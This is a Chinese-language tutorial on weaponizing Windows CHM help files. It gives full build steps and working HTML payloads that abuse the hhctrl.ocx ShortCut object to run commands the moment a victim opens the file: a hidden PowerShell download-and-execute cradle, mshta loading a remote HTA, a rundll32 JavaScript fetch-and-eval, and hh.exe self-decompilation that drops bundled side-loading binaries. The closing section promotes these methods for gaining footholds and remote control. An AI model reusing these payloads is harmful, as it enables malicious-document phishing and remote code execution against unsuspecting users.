CHM攻击利用指北「建议收藏」

简介

“Compiled Help (or HTML) Manual”简称chm，即“已编译的帮助文件”，是由微软开发文档格式，可以被认为是一种类似于RAR等压缩打包的文件格式（可以使用7z等压缩软件直接打开)， 可以包含html、图片、脚本语言以及其他文件。

当攻击者恶意利用此文件时，通常会在CHM文件内包含恶意脚本和文件，用户打开chm时便会触发恶意代码执行。著名恶意渗透框架如nishang等都支持生成CHM的恶意恶意利用。本文介绍了如何手动制作CHM，并梳理了常见的攻击利用方式。

手动制作CHM文件

chm文件由一系列html文件编译在一起，形成帮助文档，主要依靠一些配置文件来组织CHM的文件结构。

步骤1 定义HTML help project (.hhp)配置文件

hhp文件是在编译时用到的主要文件。其中定义了主页、chm文件名、标题，以及包含的文件等一系列信息。

1[OPTIONS] 
2Compatibility=1.1 or later
3Compiled file=PocCalc.chm                 // 指定生成的CHM文件名
4Contents file=Table of Contents.hhc       // 指定hhc文件
5Index file=Index.hhk                      // 指定hhk文件
6Default topic=poc.html                    // 指定首页的html文件名
7Title=PocCalc                             // 标题
8Display compile progress=No
9Language=0x410 Italian (Italy)
10Full-text search=Yes                
11
12[FILES] 
13poc.html                                  // 需要编译打包进CHM的文件
14GoogleUpdate.exe 
15goopdate.dll
16
17[INFOTYPES]

步骤2 编写html源码文件

HTML格式源码文件用来存储CHM当中的文本内容，管理组织图片, 按钮，快捷方式等呈现方式。当被攻击者利用时，常常会通过ShortCut的方式添加恶意命令，在Item1的Value中指定需要运行的进程和参数。

如下是一个通过CMD启动计算器的样例。

1<!DOCTYPE html>\
2<html>\
3<head><title>calc poc</title><head></head><body>\
4command exec\
5<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>\
6<PARAM name="Command" value="ShortCut">\
7<PARAM name="Button" value="Bitmap::shortcut">\
8<PARAM name="Item1" value=',cmd /c, Calc'>\
9<PARAM name="Item2" value="273,1,1">\
10</OBJECT>\
11<SCRIPT>\
12x.Click();\
13</SCRIPT>\
14</body></html>

步骤3 定义hhk文件

hhk文件是html格式的文件，用于保存CHM中关键字索引目录的内容， 在标签中以列举所有需要嵌入到chm文件中的附件文件对象，对象包含对象名Name和编译对象所在路径Local两个参数，设置的对象会在编译的时候编译到chm文件中。

1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">\
2<HTML> \
3   <HEAD> \
4   <meta name="GENERATOR" content="Microsoft® HTML Help Workshop 4.1">\
5   <!-- Sitemap 1.0 --> \
6   </HEAD>\
7   <BODY> \
8   <UL> \
9   <LI><OBJECT type="text/sitemap">\
10       <param name="Name" value="GoogleUpdate">\
11       <param name="Local" value="GoogleUpdate.exe">\
12       </OBJECT> \
13   <LI><OBJECT type="text/sitemap">\
14       <param name="Name" value="goopdate">\
15       <param name="Local" value="goopdate.dll">\
16       </OBJECT>\
17   </UL>\
18   </BODY>\
19</HTML>

步骤4 定义hhc文件

hhc文件也是html格式的文件，在hhc文件中，用

和
• 两个标签定义了带有层级关系中列表,并在其中以的形式嵌入了html页面对象。利用列表的层级关系，构造了最终chm文件的层级关系。

  第一个sitemap对象中包含的html文件将作为首页展示，其中的恶意代码将自动加载执行。

  1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN"> \
  2<HTML> \
  3    <HEAD> \
  4        <meta name="GENERATOR" content="Microsoft® HTML Help Workshop 4.1"> \
  5        <!-- Sitemap 1.0 --> \
  6    </HEAD> \
  7    <BODY> \
  8        <OBJECT type="text/site properties">\
  9            <param name="ImageType" value="Folder">\
  10        </OBJECT> \
  11        <UL>\
  12            <LI> <OBJECT type="text/sitemap">\
  13                <param name="Name" value="Notice">\
  14                <param name="Local" value="poc.html">\
  15                <param name="ImageNumber" value="1">\
  16                </OBJECT>\
  17         </UL>\
  18     </BODY>\
  19</HTML>
  

  步骤5 使用HHC.exe 编译

  最后我们就可以使用hhc.exe将以上文件编译打包成.chm文档。

  命令格式：hhc.exe <hhp文件路径>

  反编译

  当安全分析人员需要对CHM文档进行逆向分析的时，可以使用windows系统自带的hh.exe 对CHM文件进行反编译（常见路径C:\Windows\hh.exe,C:\Windows\SysWOW64\hh.exe）。但攻击者同样也会利用该工具释放自身CHM文件包含的恶意程序样本，该方式常常被利用来释放白加黑文件。

  命令格式：

  HH.EXE  -decompile <输出路径> <目标chm文件>

  反编译后的7-zip.chm帮助文件。

  

  常见攻击利用方式

  1 利用hhctrl.ocx对象命令执行

  攻击者可以在html源码文件中嵌入hhctrl.ocx对象来执行命令，ShortCut类型可以接受在Item中填写程序地址，并传递参数给他（不支持如%WINDIR%等环境变量）传递的Value将分割两次“，”获取程序名和参数并调用Shell32.dll的导出函数ShellExecuteA创建进程。

  [相关MSDN资料]

  docs.microsoft.com/en-us/previ…

  docs.microsoft.com/en-us/previ…

  docs.microsoft.com/en-us/previ…

  如当打开或点击左侧标题时就会执行powershell一句话命令。

  1<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>\
  2command exec \
  3<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>\
  4<PARAM name="Command" value="ShortCut">\
  5 <PARAM name="Button" value="Bitmap::shortcut">\
  6 <PARAM name="Item1" value=',powershell.exe, -nop -w hidden -c IEX ((new-object net.webclient).downloadstring("http://xx.xx.xx.xx"))'>\
  7 <PARAM name="Item2" value="273,1,1">\
  8</OBJECT>\
  9<SCRIPT>\
  10x.Click();\
  11</SCRIPT>\
  12</body></html>
  

  通过mshta运行远程hta。

  1<OBJECT id=poc classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>\
  2    <PARAM name="Command" value="ShortCut">\
  3    <PARAM name="Button" value="Bitmap::shortcut">\
  4    <PARAM name="Item1" value=",mshta,http://x.x.x.x/loader.hta";>\
  5    <PARAM name="Item2" value="273,1,1">\
  6</OBJECT>\
  7<SCRIPT>\
  8    poc.Click();\
  9</SCRIPT>
  

  通过rundll32运行JS代码。

  1<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>\
  2command exec \
  3<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>\
  4<PARAM name="Command" value="ShortCut">\
  5 <PARAM name="Button" value="Bitmap::shortcut">\
  6 <PARAM name="Item1" value=',rundll32.exe, javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://xx.xx.xx.xx",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}'>\
  7 <PARAM name="Item2" value="273,1,1">\
  8</OBJECT>\
  9<SCRIPT>\
  10x.Click();\
  11</SCRIPT>\
  12</body></html>
  

  2 释放文件并执行

  另一类攻击方式是通过使用CHM打包文件特性，将恶意文件一起打包到CHM文件中，投递给受害者，当受害者双击打开时，恶意CHM就会调用hh.exe -decompile反编译自身，释放包含其中的恶意文件并运行。该方式不需要创建网络连接二次拉取payload，隐蔽性和可利用性较高。

  获得当前CHM文件路径，创建用于命令执行的document对象，拼接当前chm文件路径到hh.exe 的参数中反编译释放当前chm文件。

  1<SCRIPT>\
  2function getPath(){ \
  3    var pathName = document.location.pathname;\
  4    var index0 = pathName.substr(1).indexOf(":");\
  5    var index1 = pathName.substr(1).lastIndexOf(":");\
  6    var result = pathName.substr(index0+2,index1-index0-2);\
  7    return result; \
  8}\
  9\
  10var dir = getPath();\
  11\
  12var commodStr = '<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>' + '<PARAM name="Command" value="ShortCut">' + '<PARAM name="Button" value="Bitmap::shortcut">' + '<PARAM name="Item1" value=",hh, -decompile C:\\Windows\\Temp\\Downloads\\ ' + dir + '">';\
  13document.getElementById('t0').innerHTML = commodStr;\
  14x.Click();\
  15</SCRIPT>
  

  函数getPath()用于获取当前chm所在的绝对路径

  定义一个Object，前两个参数为固定格式：id和classid，在第三个参数中构造要执行的命令

  获取上面定义的容器对象，通过赋值给innerHTML对象实现

  document.getElementById(‘id’).innerHTML = commandStr;

  上面语句中的id是在html中定义的

  分区的id

  触发执行 x.Click()

  3 ActiveXObject

  比起前两种方式好处是可以直接执行VBS代码或JScript代码调用ActiveXObject对象，可以使用脚本代码实现后续攻击行为。但运行时会告警目标是否启用ActiveX对象， 需要目标点击二次点击确认。

  

  

  总结

  CHM文档作为windows下常见的文档类型，总体的隐蔽性和实战价值都比较高。攻击利用时可以通过命令执行达到一句话上线，或通过二次拉取下发等方式进行云控，也可利用hh.exe -decompile反编译自身释放白加黑文件直接上线。如果目标安全警惕性较低，可以通过ActiveX对象运行恶意代码。更多关于CHM的攻击利用方法及武器化实现值得安全攻防人员关注。